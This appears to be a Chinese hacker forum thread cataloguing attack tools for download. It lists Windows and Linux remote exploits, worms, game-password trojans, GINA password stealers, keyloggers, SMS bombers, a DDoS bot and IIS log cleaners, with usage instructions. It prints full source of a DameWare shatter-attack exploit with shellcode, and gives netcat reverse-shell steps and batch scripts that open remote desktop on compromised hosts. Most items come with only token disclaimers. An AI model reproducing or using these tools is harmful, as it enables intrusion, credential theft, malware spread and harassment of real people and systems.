Advanced Instant Messengers Password Recovery 1.61 零售版，这是一款实时通讯软件存储在本机的账号密码恢复工具，如 ICQ, AOL IM, Yahoo! Messenger, MSN Messenger, Excite Messenger, Odigo, Trillian,AT&T IM Anywhere, T-Online Messenger, Match Messenger, Praize IM, ScreenFIRE, ACD Express comunicator, Imici Messenger, Prodigy IM, PowWow Messenger, Jabber IM, Kellster IM, PalTalk,

Indiatimes messenger, Miranda, Tiscali, Ya.com Messenger, Rediff Bol, Sifty Buzz, Devil, Tencent
QQ...支持多种语言口令的恢复。所破解的QQ 为.cfg文件，不知道是哪个版本了，反正我试了0825版没成功。

Outlook Express Email Snooper v1.2注册版
Outlook Express Email Snooper v1.2，是一个可以帮助你刺探那些有口令保护的outlook express 账户信息的软件。

WINNT/2000/XP登录口令破解器 V030126
WINNT/2000/XP的administrator的密码忘记了，怎么办？一张软盘就能搞定！ 这可是2003年1月26日最新发布的版本哦。

AIMPR1.50 汉化破解版
Advanced Instant Messengers Password Recovery 1.50 (汉化破解版)是一个密码恢复软件, 用于恢复即时通讯软件的登录和密码信息, 支持的网络寻呼机包括: ICQ, AOL Instant Messenger,Yahoo! Messenger,Excite Messenger, MSNMessenger, Odigo, Trillian, AT&T IM Anywhere, T-Online Messenger, MatchMessenger, Praize IM,ScreenFIRE, ACD Express Comunicator, Imici Messenger, Prodigy IM, PowWow messenger, Jabber IM, Kellster IM, PalTalk, Indiatimes messenger, Miranda, Tiscali, Ya.com
Messenger, Rediff Bol, Sify Buzz, Devil, Tencent QQ. 其中包括了我们经常使用到的 QQ, MSN Messenger 和 ICQ.

efsview.zip
加密文件系统”(EFS) 提供一种核心文件加密技术.访问加密文件时,对于该文件加密用户此加密不可见.对于非法访问者将会出现权限错误提示.这个程序可以列举某个文件的密钥所有者和恢复者.

KerbCrack 1.2
kerbcrackv压缩包里内含两个程序，其中kerbsniff.exe用来抓取Win2000/XP网络中的Kerberos登陆信息到一文件，然后使用kerbcrack进行暴力或者字典破解被捕获的信息，在Celeron 533计算机上破解时，每100万次密码尝试时间不会超过10分钟。Kerberos V5 身份验证机制是在Win2000域中进行身份验证的主要安全协议，校验了用户的身份和网络服务。

KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network

and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from

the capture file using a brute force attack or a dictionary attack. More information can be found

in the KerbCrack FAQ(http://ntsecurity.nu/toolbox/kerbcrack/faq.shtml).

AnyPassword V2.0
本程序为多种密码获取的集合，可获取电脑内一般加密后的密码（如：屏幕保护、BIOS、共享、Access、查看*号密码、以及一些常用的如优化大师等密码）并提供删除密码功能（还有一些提供了修改密码的功能）。您拥有本程序，可方便快捷的找出你所忘记的密码。本程序不须要任何控件支持，程序短小，方便下载和存放。

万象计费幽灵 V1.1版
是用来破解万象计费的一个软件...该版本修改循环打开主页的缺陷，还可以查杀万象所有版本。

美萍计费幽灵 V1.0版
美萍计费幽灵 V1.0版.使用方法，先需要用自己的会员帐号登陆，然后运行此软件.点击杀，然后马上退出你的会员帐号，30秒之后可以见到桌面!

今晚找到几个最近流行起来的系统漏洞的补丁.现在放上...是windows2003系统的...

 

Windows Media Player URL脚本命令运行缺陷
文件名：
WindowsMedia-KB828026-x86-CHS.exe

下载大小：
2841 KB

发布日期：
2003-10-3

版本：
828026

概述
已发现一个安全问题能够导致攻击者在运行Windows Media Player的计算机上执行命令。

下载地址：
http://download.microsoft.com/download/b/c/c/bcc4ac88-90b2-4abb-8be7-73d2650b96c3/WindowsMedia-KB828026-x86-CHS.exe

 

 

MS03-044 windows帮助和支持中心的缓冲区溢出
文件名：
WindowsServer2003-KB825119-x86-CHS.exe

下载大小：
328 KB

发布日期：
2003-10-15

版本：
825119

概述
一个关联HCP协议的文件能导致windows中的帮助和支持中心发生缓冲区溢出，并以当前用户的权限执行代码。

下载地址：
http://download.microsoft.com/download/f/e/3/fe3565d3-5f02-4331-8314-8d2af0b6f015/WindowsServer2003-KB825119-x86-CHS.exe

 

 

MS03-043 Messenger服务的缓冲区溢出漏洞
文件名：
WindowsServer2003-KB828035-x86-CHS.exe

下载大小：
396 KB

发布日期：
2003-10-15

版本：
828035

概述
由于Messenger服务不能适当处理消息的长度，导致缓冲区溢出。攻击者如果成功利用该漏洞，可以使代码在Local System权限下运行。

地址：
http://download.microsoft.com/download/d/9/b/d9b99e78-05d4-4bcc-a722-fe5fc4e11a36/WindowsServer2003-KB828035-x86-CHS.exe
攻击工具
这次有几个手机的攻击...screen.width-366)this.width=screen.width-366" border=0> 不知道是不是真的有用.

紫色幻影
o2o.bat最新升级版本，正式改名为“紫色幻影”，利用批量处理对目标进行攻击。
远程打开对方3389和139端口（适用于所有windows版本），
创建超级用户名，共享C,D盘。
限制IE浏览，禁止修改注册表。
运行前强行关闭病毒防火墙。（最新版本不被病毒防火墙查出）
软件本体将通过Outlook以附件形式向外传播。
远程修改注册表，制造垃圾文件，攻击目标主机。
使用方法：解压缩后，双击运行即可。
超级用户名：oo 密码：163
建议使用3389端口进行入侵。
感谢小凤居对本人的鼓励及帮助！
最新版本已经删除了对电脑有破坏作用的代码。
声明：此软件造成的一切法律后果本人均不负责。
（此项声明对前三个版本同样有效）

MessengerOverflow(MS03-043).c
利用MS03-043漏洞而攻击的exploit
DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard. Launching it one or two times against the target should make the machine reboot. Tested against a Win2K SP4."The vulnerability results because the Messenger Service does not properly validate the length of a message before passing it to the allocated buffer" according to MS bulletin. Digging into it a bit more, we find that when a character 0x14 in encountered in the 'body' part of the message, it is replaced by a CR+LF. The buffer allocated for this operation is twice the size of the string, which is the way to go, butCredits go to LSD screen.width-366)this.width=screen.width-366" border=0>

 

iSMS.vbs
iSMS.vbs手机炸弹
使用方法:

CScript iSMS.vbs 手机号码 您的姓名 您的性别 发送次数 发送内容 [累加因子]
注意: 性别中1表示先生,2表示女士,如果您的姓名或发送内容中有空格或为空时,请使用
引号将该参数引住。由于该网站不允许提交重复数据,所以在循环中参加了累加因子,该参数
是数值型可选项。
CScript iSMS.vbs -h 查阅用法实例。
例如:
CScript iSMS.vbs 01234567891 Lilo 1 100 hello 120
累加因子，会加到 内容和姓名上面随短信发出去，对方接到后会是
Lilo:121 什么什么的这样的名字。

SQL injection with 盗帅下载系统正式版2.0
盗帅下载系统的最新版本中虽然解决了大多数上一个版本中存在的漏洞，仍然存在SQL injection漏洞可以导致管理员密码的泄露，以前的for盗帅下载系统的程序已经对2.0正式版无效，此程序针对这个新漏洞而写（review.asp文件），可以得到MD5加密后的管理员密码（32位），自己再找程序破解。
 
 

 

yhWebDav.rar
一个webdav软件！发布者对这个软件进行了修改、汉化、重新编译！

SmsFlood Ver 1.0
基于命令行的手机短信攻击软件，格式是smsflood <手机号码> <发送次数><回车>。

RPC2 by sbaa(for ms03-039)
RPC DCOM2 heap overflow Vulnerability discoveried
for:
Windows 2000 Sp3,SP4+ms-026(cn)
Windows 2000 SP4 +ms-026(en)
成功后添加管理员帐号IUSA，密码为k911

RPC2v1.1(for ms03-039)
MS03-039 RPC DCOM long filename heap buffer overflow exp v1
for cn w2k server sp3/sp4+ms03-26
成功后添加管理员帐号SST，密码为557

MS03-039RPCDCOM-en.rar
MS03-039溢出程序
这个exp非常不通用。只能溢出英文版的，一般先pskill rpcss，然后再运行这个exp，如果版本参数没错的话，基本上可以成功。成功的话，会添加一个账号。（未测试）

Simple Bind 1.0
一个EXE文件合并器，使用非常简单，合并完后它还会提示你是否要修改图标。

newrpc.zip
三个RPC最新溢出代码，测试用，请谨用。

DDoS攻击者 1.4
本软件是一个DDoS攻击工具，程序运行后自动驻入系统，并在以后随系统启动，在上网时自动对事先设定好的目标进行攻击。可以自由设置“并发连接线程数”、“最大TCP连接数”等参数。由于采用了与其它同类软件不同的攻击方法，效果更好。

注：本软件只可用于DDoS攻击测试，请勿将其用于非法用途。

CuteIISLogClean 1.1
一个清除IIS日志的工具，可以根据自定义的字符串来删除日志中包含该字符串的行有手动和自动两种模式，自动模式直接根据自定义的字符串自动清理当天的日志手动模式可以指定一个日志文件进行清理

THCREALbad v0.4
可以溢出linux和WINDOWS下的Realserver 7,8,9版本
F:/>THCrealbadc

THCREALbad v0.4 - Wind0wZ & Linux remote root sploit for Realservers 8+9
by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)

Usage:
0 = Wind0wZ
1 = Linux
2 = OS Test Mode

0x82-wu262-advanced.rar
Wu-ftpd v2.6.2溢出程序加强版，把FBSD，OBSD WU26*加进去了，并加了个扫描的功能。

 

fm-shatterdame.rar
DameWare Mini-RC溢出程序
使用方法
首先打开DameWare Mini Remote Control Server
然后运行本程序！
注意：
不是DameWare NT Utilities

DameWare Mini-RC 破坏攻击

涉及程序：
DameWare Mini-RC

描述：
DameWare Mini-RC 破坏攻击

详细：
DameWare为管理员设计的能简单操作的远程控制软件，提供快速帮助，无须外界帮助和机器重启就可简易配置。DameWare Mini远程控制端以SYSTEM级运行在用户桌面。在DameWare中发现存在破坏性攻击。

受影响系统：
DameWare Mini远程控制服务端3.71.0.0之前的版本

攻击方法：
示例代码：
/*
Shatter attack exploit for DameWare Mini Remote Control Server
by ash@felinemenace.org

see associated advisory

This code is based on shards.cpp by xenophile

*/

#define WIN32_LEAN_AND_MEAN
#include
#include
#pragma warning(disable: 4305)
#pragma warning(disable: 4309)
void MakeShellCode (char *buffer)
{
HMODULE hCRT;
void * lpSystem;
int count=0;

while (count < 36)
{
buffer [count] =0x90;
count ++;
}

buffer[37]=0x8B; buffer[38]=0xE5; buffer[39]=0x55;
buffer[40]=0x8B; buffer[41]=0xEC; buffer[42]=0x33;
buffer[43]=0xFF; buffer[44]=0x90; buffer[45]=0x57;
buffer[46]=0x83; buffer[47]=0xEC; buffer[48]=0x04;
buffer[49]=0xC6; buffer[50]=0x45; buffer[51]=0xF8;
buffer[52]=0x63; buffer[53]=0xC6; buffer [54]=0x45;
buffer[55]=0xF9; buffer[56]=0x6D; buffer [57]=0xC6;
buffer[58]=0x45; buffer[59]=0xFA; buffer[60]=0x64;
buffer[61]=0xC6; buffer[62]=0x45; buffer[63]=0xFB;
buffer[64]=0x2E; buffer[65]=0xC6; buffer[66]=0x45;
buffer[67]=0xFC; buffer[68]=0x65; buffer[69]=0xC6;
buffer[70]=0x45; buffer[71]=0xFD; buffer [72]=0x78;
buffer[73]=0xC6; buffer[74]=0x45; buffer [75] =0xFE;
buffer[76]=0x65;

hCRT = LoadLibrary("msvcrt.dll");
lpSystem = GetProcAddress( hCRT, "system" );
buffer[77]=0xB8;
buffer[78]=((char *)&lpSystem) [0];
buffer[79]=((char *)&lpSystem) [1];
buffer[80]=((char *)&lpSystem) [2];
buffer[81]=((char *)&lpSystem) [3];
buffer [82] =0x50; buffer[83]=0x8D; buffer[84]=0x45;
buffer[85]=0xF8; buffer[86]=0x50; buffer[87]=0xFF;
buffer [88]=0x55; buffer[89]=0xF4;
count = 90;
while (count < 291)
{
buffer [count] =0x90;
count ++;
}
buffer[291]=0x24; buffer[292]=0xF1; buffer [293]=0x5D;
buffer[294]=0x01; buffer[295]=0x26; buffer[296]=0xF1;
buffer [297] =0x5D; buffer[298]=0x01; buffer[299]=0x00;
buffer[300]=0x00;
return;
}
void ErrorNotify(DWORD err, char *title)
{
LPVOID lpMsgBuf;
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
err,
MAKELANGID (LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language
(LPTSTR) &lpMsgBuf,
0,
NULL
) ;

printf("%s/n",lpMsgBuf);

LocalFree( lpMsgBuf );
};
#define SHELLCODE_SIZE (1024 * 256)
#define SHELLCODE_OFFSET (SHELLCODE_SIZE -400)
int main(int argc, char* argv[])
{
HWND hWnd;
HWND hWndChild;
char sc[SHELLCODE_SIZE];
char szWindowName[] = "About DameWare Mini Remote Control Server";
LONG lExecAddress;
sc[0] = x; sc[1] = e; sc[2] = n; sc[3] = 0;
memset( &sc[4], 0x90, SHELLCODE_SIZE -4);
MakeShellCode( &sc[SHELLCODE_OFFSET] );
printf( "/nfm-shatterdame.c/nash(AT)felinemenace.org/n" );
printf("--------------------------------------------------------------/n");
printf("Exploits shatter attack in DameWare Mini Remote Control Server/n");
printf("This is based on shards.cpp written by xenophile./n") ;
printf("--------------------------------------------------------------/n");
printf(
"STEP 1: Finding our window!/n"
) ;

hWnd = FindWindow( NULL, szWindowName );
if( hWnd == NULL)
{

printf("Couldnt find the dameware about dialogue. Open it and re-run this/n");
return 0;
}

hWndChild = FindWindowEx(hWnd, NULL, "Edit", NULL);

if( hWndChild == NULL)
{

printf("/tCouldnt find child edit control window/n");

return 0;
}

SendMessage( hWndChild, EM_SETREADONLY, 0, 0 );

SendMessage( hWndChild, EM_SETLIMITTEXT, SHELLCODE_SIZE, 0L );

if ( ! SendMessage( hWndChild, WM_SETTEXT, 0, (LPARAM)sc ) ) {
ErrorNotify ( GetLastError (), "error");
}
printf(
"/n/nSTEP 2: Enter shell code address. "
"This can be found using a debugger."
) ;
printf( "/nOn my XP SP1 machine 0x160000 worked./n" );

printf( "/n/nEnter execution address: " );
scanf( "%x", &lExecAddress );

if ( ! SendMessage( hWndChild, EM_SETWORDBREAKPROC, 0L, (LPARAM)lExecAddress ) ) {
ErrorNotify( GetLastError(), "error" );
}

SendMessage( hWndChild, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a );

return 0;
}

解决方案：
DameWare Mini 3.71.0.0版修正该缺陷，请用户及时访问下列站点进行升级：
www.dameware.com

 

 
 

黑客在线感谢您的参与
 
 
 
[小广播]2004年第8期黑客在线10日即将上市，要购买杂志的读者注意啦！　
头衔：入侵无痕

 
    

追风箭

 

荣誉：名人
职务：论坛版主
级别：风云使者
积分：1088
经验：5296
文章：1036
注册：2003-12-27
 
  发表: 2004-07-16 20:46:22   第7楼

wu262.zip
wuftp2.62远程溢出攻击工具
wuftpd version 2.6.2 remote root exploit that makes use of the off-by-one vulnerability discussed

here. Win32 version included that requires cygwin1.dll. Homepage: http://x82.inetcop.org/. By

Xpl017Elz. Ported to Win32 by class101.

RPC Exploit GUI v2
RPC Exploit GUI v2，将几款主要的工具集于一身的。当你尝试使用这个新版的RPC Exploit去“hack”别人的2000/XP/2003主机的时候，常用的FTP服务端和端口扫描器就在你的手边。它将目标转换到DOS命令行模式，并允许你使用FTP服务端上传文件，和远程执行程序。

KAHT II
KAHT II - MASSIVE RPC EXPLOIT
Rpc DCOM批量溢出

dcomrpc.rar
DcomRpc修改通用版
感觉那个有反弹功能的通用版有点不好使，Expl01t修改了这个，测试了，很恐怖。。。。

iis-media.rar
Windows Media服务nsiislog.dll远程溢出程序

T-SysCmd v1.0
本程序为一款基于IDT的攻击程序，也可以说是Windows系统下的内核级后门程序。
它可为任意用户(包括Guest)提供SYSTEM权限级别的Command。
适应平台： Intel x86 Family, Windows 2000/XP。

Immunity CANVAS
可以在任何平台运行,用python写的一个攻击工具集合,是一个商业程序,售价995美金的东西.

 

BBSXP-dzk.zip
新的BBSXP论坛漏洞利用工具，漏洞利用原理请看压缩包里的说明。

rpc-exploit.rar
作者：“因测试环境受限，我只测试了中文版的win2000/xp 的版本，都很成功！
其他版本请大家帮忙测试，我想即使这个不成功，也会出现英文版、繁体版等等的通用版本！这主要因为windows 操作系统内存管理分配存在（固定）堆的问题！而以前都停留在动态连接库中查询，才会受补丁影响。在（固定）堆中例如ff e4 、50 c3 、51 c3、 52 c3、 53 c3、 54 c3等等很多，基本上能解决目前返回地址的问题。希望大家在着一方面作更多研究彻底解决sp 的问题。我的程序中dcom rpc 漏洞，返回地址随便挑的54 c3 （push esp/ ret）。
我的程序一个是dcom rpc攻击程序，在远程机器添加user/pass:qing10/qing10、另外一个远程启动rpcss服务

恢复被攻击机器的工作环境。”

cndcom.rar
Remote DCOM RPC Buffer Overflow Exploit
RPC 溢出程序
针对以下版本:
- Targets:
- 0 Windows 2000 SP0 (English)
- 1 Windows 2000 SP1 (English)
- 2 Windows 2000 SP2 (English)
- 3 Windows 2000 SP3 (English)
- 4 Windows 2000 SP4 (English)
- 5 Windows XP SP0 (English)
- 6 Windows XP SP1 (English)
- 7 Windows NT SP5 (Chinese)
- 8 Windows NT SP6 (Chinese)
- 9 Windows NT SP6 (Chinesebig5)
- 10 Windows 2000 SP0 (Chinese)
- 11 Windows 2000 SP1 (Chinese)
- 12 Windows 2000 SP2 (Chinese)
- 13 Windows 2000 SP2 add(Chinese)
- 14 Windows 2000 SP3 (Chinese)
- 15 Windows 2000 SP3 add(Chinese&big5 sp3)
- 16 Windows 2000 SP4 (okChinese)
- 17 Windows 2000 SP4 add(Chinese)
- 18 Windows XP SP1 (Chinese)
- 19 Windows 2000 SP0 (Japanese)
- 20 Windows 2000 SP1 (Japanese)
- 21 Windows 2000 SP2 (Japanese)
- 22 Windows 2000 SP0 (Korean)
- 23 Windows 2000 SP1 (Korean)
- 24 Windows 2000 SP2 (Korean)
- 25 Windows 2000 SP0 (MX)
- 26 Windows 2000 SP1 (Mx)
Usage: cndcom

铁血-Open3389 V1.1
完全用批处理写的远程开启3389服务的工具。不依赖管理共享了。
tx3389.bat [IP] [用户名] [密码]
tx3389.bat [肉鸡文件]
如果指定肉鸡文件批处理将从文件中读取ip 用户名 密码
肉鸡文件的文件格式为ip 用户名 密码。空格隔开。
例1：tx3389 192.168.0.2 user ""
例2：tx3389 file.txt
肉鸡文件格式如下（空格隔开）：
192.168.0.1 user ""
192.168.0.2 administrator 123
192.168.0.24 administrator admin

冰点病毒
本文件分为 bingdian.vbs 和 reset.vbs。
★bingdian.vbs为病毒文件请谨慎使用！！！
★假如不小云运行了病毒文件，请使用 reset.vbs 解毒！
本病毒编写语言为 VBSCRIPT 脚本语言，只要是大量修改注册表。
病毒产生在WINDOWS目录下明为冰点（bingdian),修改注册表各项参数，以及WINDOWS各种设置，设置开机对话筐为Welcome to bing dian BBS，并且通过电子邮件进行传播，请谨慎使用！

dcom.pl
Dcom.pl 远程溢出攻击脚本
该脚本可以影响使用RPC的DCOM接口，此接口处理由客户端机器发送给服务器的DCOM对象激活请求(如UNC路径)。攻击者成功利用此缺陷可以以本地系统权限执行任意指令。攻击者可以在系统上执行任意操作，如安装程序、查看或更改、删除数据或建立系统管理员权限的帐户。
用法:
dcom.pl 127.0.0.1

sqldos.rar
exp for Microsoft SQL Server DoS(MS03-031)
微软sqlserver拒绝服务漏洞攻击程序

s-demo.rar
s-demo的通用密码察看器
可以查看出动画的原始加的密码是什么
要求是动画文件的名字是moon.exe
瑞星会提示病毒，其实是误报

 

wdx.rar
使用方法: wdx.exe 目标IP

代码的原型是isno的webdav3.pl
本次修改范围
1、将lock替换成了PROPFIND这样会减少目标主机iis崩溃的可能

2、修改了溢出代码，对于默认设置sp3版本的主机基本上可以做到一次成功

3、将反馈信息都改为中文的了！谁叫我们都是中国人。

4、就修改了以上这么多
作者：雪莲莲
本人经过测试，命令格式应该是WDX IP offset type
offset有0-20和-1--267
TYPE有GB和BIG5两种语言
比如：wdx 127.0.0.1 0 1
我已经溢出过了，一次成功，速度也快

LB论坛search.cgi漏洞利用程序
LB论坛search.cgi漏洞利用程序，已经编译好。请不要恶意攻击，后果自负。。。使用方法见说明。

 
 

 

re.zip
天行的Microsoft Rpc Locator Service的攻击程序,可以使远程攻击者获取system权限.

例子:

e:/tools.dos>re -h 10.24.9.100
Microsoft Rpc Locator Service Exploit
Web : www.tianxing.orgwww.tophacker.net
Email : tianxing@163.net
Thanks: yuange.

[!] Connecting to 10.24.9.100

OS Type: Windows 2000 SP0-SP3
[$] Connected 10.24.9.100!
[+] Exploiting 10.24.9.100!
[>] Sending shellcode!

Trying to reuse connect to 10.24.9.100:138 ...
[!] Connected! Here comes the shell baby...

 

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:/WINNT/system32>

IEobjectEXP.rar
Microsoft Internet Explorer对象类型属性缓冲区溢出漏洞
测试程序
漏洞描述详见
http://www.chinesehack.org/file/bug/show.asp?id=7669

 

动网logout.asp利用程序
动网logout.asp利用程序（已编译）
相关文章：
http://www.chinesehack.org/file/hkart/show.asp?id=7193

 

开3389终端的批处理程序
红衣刺客编写的一个给远程主机开3389终端的批处理程序
压缩包里面的文件：
open3389.bat 开3389终端的批处理程序
3389.bat 辅助批处理
psexec.exe NT的远程执行工具

使用方法：
open3389.bat 肉鸡的IP 肉鸡的ADMIN组的用户 用户的密码
open3389.bat IP USER PASS

winmercrexp.rar
MERCUR Mailserver 4.2.0.0 remote 'SYSTEM' level exploit
该程序利用的是2000／XP系统提供的一个MAIL　SERVER中所存在的一个远程溢出，而安装这个MAIL　SERVER通常会开放一个端口32000，所以扫描目标可以扫描32000端口，当然找到这个端口，必须得确认为2000／XP，而不是UNIX／LINUX。
使用格式如下：
先在本机上使用NC开一个监听：
nc -l -p 3333

然后进行远程溢出：
winmercrexp 目标IP　32000　自己IP　3333

如果NC可以得到对方的CMD　SHELL就成功了。

 

Maelstromexp.c
maelstorm这个游戏在很多linux下面都安装了，3.06版本以前很多是setuid的。有人发现有缓冲区溢出漏洞，网上存在的几个作者在他的redhat 9.0下都不能成功溢出，上次翻译了netric的溢出文章以后试着写的一个。
一次成功，不需要猜测ret.

 

mailexp.c
linux的几个最新版本的mail都有缓冲区溢出问题，但是都没有SUID，just play for fun

x_diagrpt_aix5l_4x.sh
Exploit local diagrpt command of Aix5.x & 4.x to get a root shell.
Tested on Aix5.1 , Aix4.3.3.

如果不成功则通常是你的系统已经打了相应补丁。

 

daoshui.zip
盗帅下载系统攻击脚本是lcx根据wawa的改的。盗帅下载作者只测试过1.0，可能2.0同样适用。

 

SMBRelay2 v.98
SMBRelay2 v.98 - NetBIOS level SMB man-in-the-middle relay attack
NetBIOS level SMB中间人攻击工具。
详细使用请看说明。

 

sars_final.tar.gz
由adore改写而来（后门程序都是adore的），通过samba的远程溢出进行传播，里面附带c源码和清除脚本
(clean.sh)。好早就写出来的东西，现在有这个漏洞的机器不是很多了，请使用者在内网测试。放出来的目的
是给大家一个写worm的模板。注意:破坏不是目的,请尊重他人的劳动果实(数据),为自己的行为负责

IPC Auto Hacker Ver 1.7
这个是个自动收集肉鸡的批处理,现在你所拿到是最新版的1.7(5月25日发布)，当然，也有自动入侵的部分，而且速度是网上现在能找到的IPC批量入侵的N倍只是Blackfox有点懒，以后的几个版都是同个朋友帮他发布的，这一版的有这我们剑鹰技术联盟来发布

升级说明：
增加了IPC补丁文件
补丁文件里加上打开远程终端的功能(端口为:2236)
修正了肉机补丁的Bug
修正了1.6补丁升级版中的COPYIPC补丁出错问题
去除了开启TELNET服务的功能(Blackfox感觉有WinEggDropShell就够了)
增加了字典的的常用单词，去除了一些不常用的
修正了说明文档

Pi3web-DoS
DoS工具，内含源代码。

linux_atm.c
Linux 下atm的本地溢出程序（问题出在les）
redhat7.3测试通过

 

ms03-013_exp_for_win2k.rar

Microsoft Windows内核消息处理本地缓冲区存在溢出漏洞
详细请看http://www.chinesehack.org/file/bug/show.asp?id=7440

Webdav MICROSOFT IIS DoSser
webdav DoS工具
Microsoft IIS WebDAV存在超长请求远程拒绝服务攻击漏洞，具体请看

http://www.chinesehack.org/file/bug/show.asp?id=7629
运行xDebug.exe，成功后会以SYSTEM权限运行ey4s.bat

wmi.zip
windows2000中提升权限的东西,运行以后会内建一个XX用户名的管理员权限的用户
相关文章http://www.xfocus.net/articles/200305/540.html

WINNTAutoAttack 2.6+简单使用教程

Windows NT/2000 自动攻击探测机
该版本已经开放部分自动攻击探测功能,本程序仅供研究测试用,用于其他或者非法途径后果自负。

 

DVtxt.rar
动网文章是一款由WWW.ASPSKY.NET开发和维护的源代码开放的文章管理系统，在国内使用非常广泛；由于其

list.asp等模块没有过滤用户提交传递给SQL查询的输入，导致远程攻击者可以利用这个缺陷进行SQL注入攻击

。
注意: 请不要恶意破坏他人系统! 此程序仅仅为测试安全所用,请不要用于其他非法途径! 如果你不同意,请立

即删除! 我们不对此程序带来的任何后果负责,亦不提供任何技术支持!

 

批处理编写的IPC蠕虫
IPC Worm的功能：

1、杀死本地杀毒程序的进程。
2、在本地添加一个用户名。
3. 把自身复制到启动项。
4. 共享C D E F 盘
4、随即生成一个IP地址。
5、扫描弱口令。
7、复制自身到目标主机，并执行。

破解网吧
破解网吧部分设置的软件！
附带一个网页在线打开模版，以供本程序在网页中直接运行！
感谢作者提供。

 
 

嗅探监听
这次找到了些游戏的东东.大家看看吧.其他的都相当于监控软件了.

 

密码王朝之奇迹影子
本程序可准确截取准确截取奇迹游戏的登陆区，服务器，用户名，密码 ，仓库密码，全面支持游戏最新版，躲避个各大杀毒软件……

传奇密码终结者
说明：
1、能截取传奇区域、用户名、密码、服务器、人物名称、职业、等级及修改密码、注册新用户里的所有信息。
2、能自动判断用户名及密码的准确性，只记录正确的ID和密码。
3、主程序体积只有23KB，这更加有利用于程序的合并及制作网页木马.
4、能自行关闭多种杀毒软件及防火墙。【如：金山毒霸2003、金山网镖2003、瑞星杀毒2003、天网防火墙、木马克星、绿鹰PC万能精灵、噬菌体密码防盗专家、网吧密码防盗专家、Lockdown、ZoneAlarm ……】

光媒奇迹木马(gmmuspy)
特点：捕获奇迹游戏的登陆帐号，密码，具体服务器，仓库密码，IP地址，时间等信息。双重捕获，一触即发。其中仓库密码为全程记录，无论设立，修改，进入仓库，其密码都能顺利记录，并发送到指定的邮箱。独特的分模块技术使功能无限扩展，是游戏木马中的典范之作。

密码王朝破天影子
本程序可准确截取准确截取破天一剑游戏的登陆区，服务器，用户名，密码 ，全面支持游戏最新版，躲避个各大杀毒软件……

光媒网络传奇世界木马
捕获传奇世界的登陆区号，帐号，密码，服务器，IP地址，发送邮件时间等信息，并且发信件到指定邮箱。采用特殊的记录方式，无论密码是由键盘输入还是软键盘输入，都能顺利，完全的记录。采用分模块技术，程序健壮，功能无限扩展。是网络上第一家公开发布的传奇世界木马。鉴于传奇世界的某种特殊性，使在开发此木马上增加了一定的难度。光媒网络的首家推出，充分证明了光媒网络雄厚的技术力量。

Anti-Sniffer 1.0
一个检测系统所有网卡是否处于混杂模式的小程序(处式的话是有嗅探器在进行嗅探).只检测本地系统(运行了这程序的系统)，只用于win 2k/xp/2003

密码天使之光通来客
本程序可准确截取光通游戏登陆的ID,密码，服务器等，全面支持传奇最新版。

程序随计算自动启动，可躲避各大杀毒软件。

测试版只显示部分密码，不自动运行；
正式版可远程截取，随计算机自动运行.软件显示详细级别，区号，服务器　软件采用线程技术，防查杀；软件最大的特点在于采用了网页木马，远程盗取，我们利有IE5.0/6.0的漏洞软件会自行下载安装并支持，采用80端口发信，正常保证用户的使用，我们还提供菜来姆对软件进行感染，以保证用户安装的木马随时正常运行。我们采用最新的句柄性技术盗取，保证木马的准确无误，在业内是第一个采用此核心技术的软件。

天舟慧眼 v1.4
天舟慧眼 v1.4 注册版，是一款以日志形式记录PC行为的国产系统监视软件。它会自动将你的电脑每天的动作、行为以系统的开关机时间（对应多次起动）、用户名、每个被打开窗口的标题、开始时间、结束时间、活动时间、击键数量等形式记录下来，用户可以用专用的日志管理程序查看每天的记录，并可在各种模式下对历史记录进行搜索、排序和统计分析。天舟慧眼还具有自动将每天的历史纪录以Email发送到其他PC上进行远程监视等功能。若设定统计关键字，还可以对每个特定应用程序每天使用的情况进行自动统计分析。对于上网记录,还可以通过日志管理程序直接登陆历史网站。天舟慧眼具有隐蔽或显示两种工作模式。

联众GOP1.0 本地版
录联众密码的东东.运行一次后,随计算机自动启动.
解压后把联众GOP,放到别人看不到的目录里运行.运行后什么反应都没有.应为本程序是在后台运行. 　
记录的联众密码在系统目录里的gl.txt文件里,打开方式选为记事本就可以.

猎游者之传奇2
记录并发送传奇2用户信息的软件
本程序可以捕捉奇迹登陆帐号，密码，服务器 ，仓库密码等信息。发信时防火墙无法阻拦。正式版经过特殊处理，杀毒软件不能对其查杀。
作者提供。

猎游者之传奇3
记录并发送用户信息的软件
本程序可以捕捉传奇3登陆帐号，密码，服务器 人物名称，级别等信息。发信时防火墙无法阻拦。正式版经过特殊处理，杀毒软件不能对其查杀。
作者提供。

牛族nt/2000/xp 密码大盗V1.1
主要利用NT系统GINA(Graphical Identification and Authentication，图形化的身份认证) 进行密码窃取的程序，劫获的密码被保存在system目录下的 GinaPwd.txt 里，捕捉到的密码文件格式如下(我的机器 WIN XP下测试结果,呵呵，这个密码当然是REMARK的咯。。。^_^ )

日期：[07/22/00] 时间：[03:27:33]
=====================================
用户名：maomao
密码：windows2000
登陆域：TZOL

Fearless Key Spy v1.1b
这是一款间谍软件，能将对方使用电脑的logs上传到指定FTP服务器。

Iris Network Traffic Analyzer v4.06.4
Iris Network Traffic Analyzer v4.06.4 零售版，eeye公司出品的网络流量分析监测工具，可以帮助系统管理员轻易地捕获和察看用户的使用情况，可以同时测到进入和发出的信息流

sniffer pro 4.70.530
sniffer pro 4.70.530汉化注册版
sniffer pro，NAI公司出品的可能是目前最好的网络协议分析软件之一了，支持各种平台，性能优越，做为一名合格的网络管理员肯定需要有这么一套好的网络协议分析软件了，只是有点大请用下载工具下载。

密码监听器 v2.2
密码监听器 2.2注册版
密码监听器用于监听基于WEB的邮箱密码。只需在一台电脑上运行，就可以监听局域网内任意一台电脑登录的用户名和密码，并将密码显示、保存，或发送到用户指定的邮箱。

KFSensor Version 1.3.0
KFSensor Version 1.3.0
KFSENSOR的优点：

1）准确性比较强，防火墙与其他的IDS常常会被一些“合法”了的网络通信所“迷惑”，从而被RULE所“曲解”,而KFSENSOR是不会分辨所有的连接中谁是合法，谁是不合法的。

